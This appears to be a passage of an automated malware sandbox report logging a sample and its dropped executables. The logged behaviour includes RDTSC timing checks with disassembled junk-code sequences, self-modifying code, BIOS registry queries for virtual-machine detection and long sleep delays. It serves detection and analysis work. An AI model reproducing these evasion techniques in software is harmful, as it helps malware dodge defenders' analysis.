Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560763 second address: 556078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F76D8D6050Eh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556078E second address: 5560792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560792 second address: 556083E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F76D8D6050Ah 0x00000008 add esi, 61C72658h 0x0000000e jmp 00007F76D8D6050Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007F76D8D60518h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F76D8D60511h 0x00000024 or eax, 693214A6h 0x0000002a jmp 00007F76D8D60511h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F76D8D60510h 0x00000036 jmp 00007F76D8D60515h 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e jmp 00007F76D8D6050Eh 0x00000043 mov esi, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov si, di 0x0000004c mov ebx, 22E430ECh 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556083E second address: 5560855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, DBh 0x00000005 mov edi, 7F8A61F0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 6352h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560855 second address: 55608CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F774928E060h 0x0000000e pushad 0x0000000f jmp 00007F76D8D6050Dh 0x00000014 mov eax, 66D82667h 0x00000019 popad 0x0000001a cmp dword ptr [75AF459Ch], 05h 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 pushfd 0x00000026 jmp 00007F76D8D60514h 0x0000002b jmp 00007F76D8D60515h 0x00000030 popfd 0x00000031 popad 0x00000032 je 00007F77492A60EFh 0x00000038 pushad 0x00000039 mov ecx, 46B1A5D3h 0x0000003e popad 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F76D8D60511h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55608CF second address: 55608F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D9275007h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cx, F9CDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55608F7 second address: 5560950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F76D8D6050Ch 0x00000011 adc si, 7E18h 0x00000016 jmp 00007F76D8D6050Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F76D8D60518h 0x00000022 jmp 00007F76D8D60515h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560974 second address: 556097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556097A second address: 556097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556097E second address: 556098F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556098F second address: 5560993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 430F7B second address: 430F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 43E604 second address: 43E613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F76D8D60508h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 43E772 second address: 43E7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 jno 00007F76D9274FF6h 0x0000000e jmp 00007F76D9275000h 0x00000013 pop esi 0x00000014 push esi 0x00000015 jmp 00007F76D9275008h 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F76D9275000h 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 43EDD9 second address: 43EDF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60511h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 43EDF2 second address: 43EDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 43EDF6 second address: 43EDFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441E7F second address: 441E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441E83 second address: 441E89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441E89 second address: 441ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D9275008h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov esi, 1474B0ECh 0x00000015 push 00000000h 0x00000017 call 00007F76D9274FF9h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F76D9275002h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441ED0 second address: 441ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441ED6 second address: 441EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441EDA second address: 441F10 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F76D8D60510h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jnl 00007F76D8D6050Ch 0x0000001d pop edi 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441F10 second address: 441F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441F15 second address: 441F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F76D8D60515h 0x00000012 pop eax 0x00000013 jl 00007F76D8D60519h 0x00000019 call 00007F76D8D60511h 0x0000001e stc 0x0000001f pop ecx 0x00000020 push 00000003h 0x00000022 xor dword ptr [ebp+122D29DDh], eax 0x00000028 push 00000000h 0x0000002a mov ecx, edx 0x0000002c push 00000003h 0x0000002e or dword ptr [ebp+122D2442h], edx 0x00000034 call 00007F76D8D60509h 0x00000039 jc 00007F76D8D60510h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441F80 second address: 441F8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 441F8B second address: 44200B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F76D8D60510h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ebx 0x00000012 push ecx 0x00000013 jns 00007F76D8D60506h 0x00000019 pop ecx 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F76D8D60519h 0x00000024 pop eax 0x00000025 call 00007F76D8D60519h 0x0000002a mov di, dx 0x0000002d pop ecx 0x0000002e lea ebx, dword ptr [ebp+12447D6Dh] 0x00000034 jmp 00007F76D8D6050Eh 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jl 00007F76D8D60508h 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 4420A1 second address: 442110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F76D9274FFCh 0x0000000b popad 0x0000000c xor dword ptr [esp], 1BB7F37Bh 0x00000013 jnl 00007F76D9274FFCh 0x00000019 push 00000003h 0x0000001b push edi 0x0000001c push esi 0x0000001d movzx edi, si 0x00000020 pop esi 0x00000021 pop edx 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 add dword ptr [ebp+122D1CA0h], eax 0x0000002b pop edx 0x0000002c push 00000003h 0x0000002e push ecx 0x0000002f mov dword ptr [ebp+122D2530h], eax 0x00000035 pop ecx 0x00000036 push D109BDD1h 0x0000003b push edx 0x0000003c push eax 0x0000003d pushad 0x0000003e popad 0x0000003f pop eax 0x00000040 pop edx 0x00000041 xor dword ptr [esp], 1109BDD1h 0x00000048 mov edx, dword ptr [ebp+122D3B33h] 0x0000004e lea ebx, dword ptr [ebp+12447D76h] 0x00000054 mov di, si 0x00000057 sub dword ptr [ebp+122D288Fh], edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 442110 second address: 442117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 442117 second address: 44211C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 453B7D second address: 453B82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 461F6B second address: 461F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 461F71 second address: 461F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F76D8D60510h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 45FE82 second address: 45FE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460186 second address: 460192 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76D8D6050Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460192 second address: 4601AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F76D9275004h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 4601AE second address: 4601B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460440 second address: 460445 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 46073E second address: 46076F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76D8D60506h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e jbe 00007F76D8D60508h 0x00000014 pushad 0x00000015 jmp 00007F76D8D60512h 0x0000001a jbe 00007F76D8D60506h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460A3D second address: 460A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460A41 second address: 460A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D6050Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F76D8D60512h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460A6A second address: 460A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460A72 second address: 460AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76D8D6050Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F76D8D60514h 0x00000013 jno 00007F76D8D6050Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 460AA6 second address: 460ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F76D9274FF6h 0x00000009 jc 00007F76D9274FF6h 0x0000000f jg 00007F76D9274FF6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 461041 second address: 461054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007F76D8D6050Ch 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 461054 second address: 461059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 458DB1 second address: 458DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F76D8D60516h 0x0000000b popad 0x0000000c jmp 00007F76D8D60513h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 458DE1 second address: 458DF1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D9275002h 0x00000008 jnl 00007F76D9274FF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe RDTSC instruction interceptor: First address: 461725 second address: 46172F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 120C418 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 121C643 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 2CDE26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 494723 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 46EFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 2CDD51 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Special instruction interceptor: First address: 7BED9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 4FE6C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Special instruction interceptor: First address: 96F74A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Special instruction interceptor: First address: 9F7582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 53ED9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6EF74A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 777582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Special instruction interceptor: First address: 2D5D83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Special instruction interceptor: First address: A8C418 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Special instruction interceptor: First address: A9C643 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Special instruction interceptor: First address: FBD860 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Special instruction interceptor: First address: 1162988 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Special instruction interceptor: First address: 11F47B9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: DEDE26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: FB4723 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: F8EFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: DEDD51 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: 101E6C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Special instruction interceptor: First address: 1FED9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Special instruction interceptor: First address: 3AF74A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Special instruction interceptor: First address: 437582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: C5DE26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: E24723 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: DFEFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: C5DD51 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Special instruction interceptor: First address: 8BED9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Special instruction interceptor: First address: A6F74A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Special instruction interceptor: First address: AF7582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: E8E6C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Special instruction interceptor: First address: C65D83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Special instruction interceptor: First address: DF5D83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Memory allocated: 49B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Memory allocated: 4C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Memory allocated: 6C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Memory allocated: 5040000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Memory allocated: 52E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Memory allocated: 72E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Memory allocated: 4FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Memory allocated: 51D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Memory allocated: 4FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_00442177 rdtsc 3_2_00442177
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2604 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2805 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2793 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Window / User API: threadDelayed 445
Source: C:\Users\user\Desktop\file.exe TID: 6172 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe TID: 5228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5344 Thread sleep count: 69 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5344 Thread sleep time: -138069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep count: 73 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep time: -146073s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2460 Thread sleep count: 332 > 30 Jump to behavior
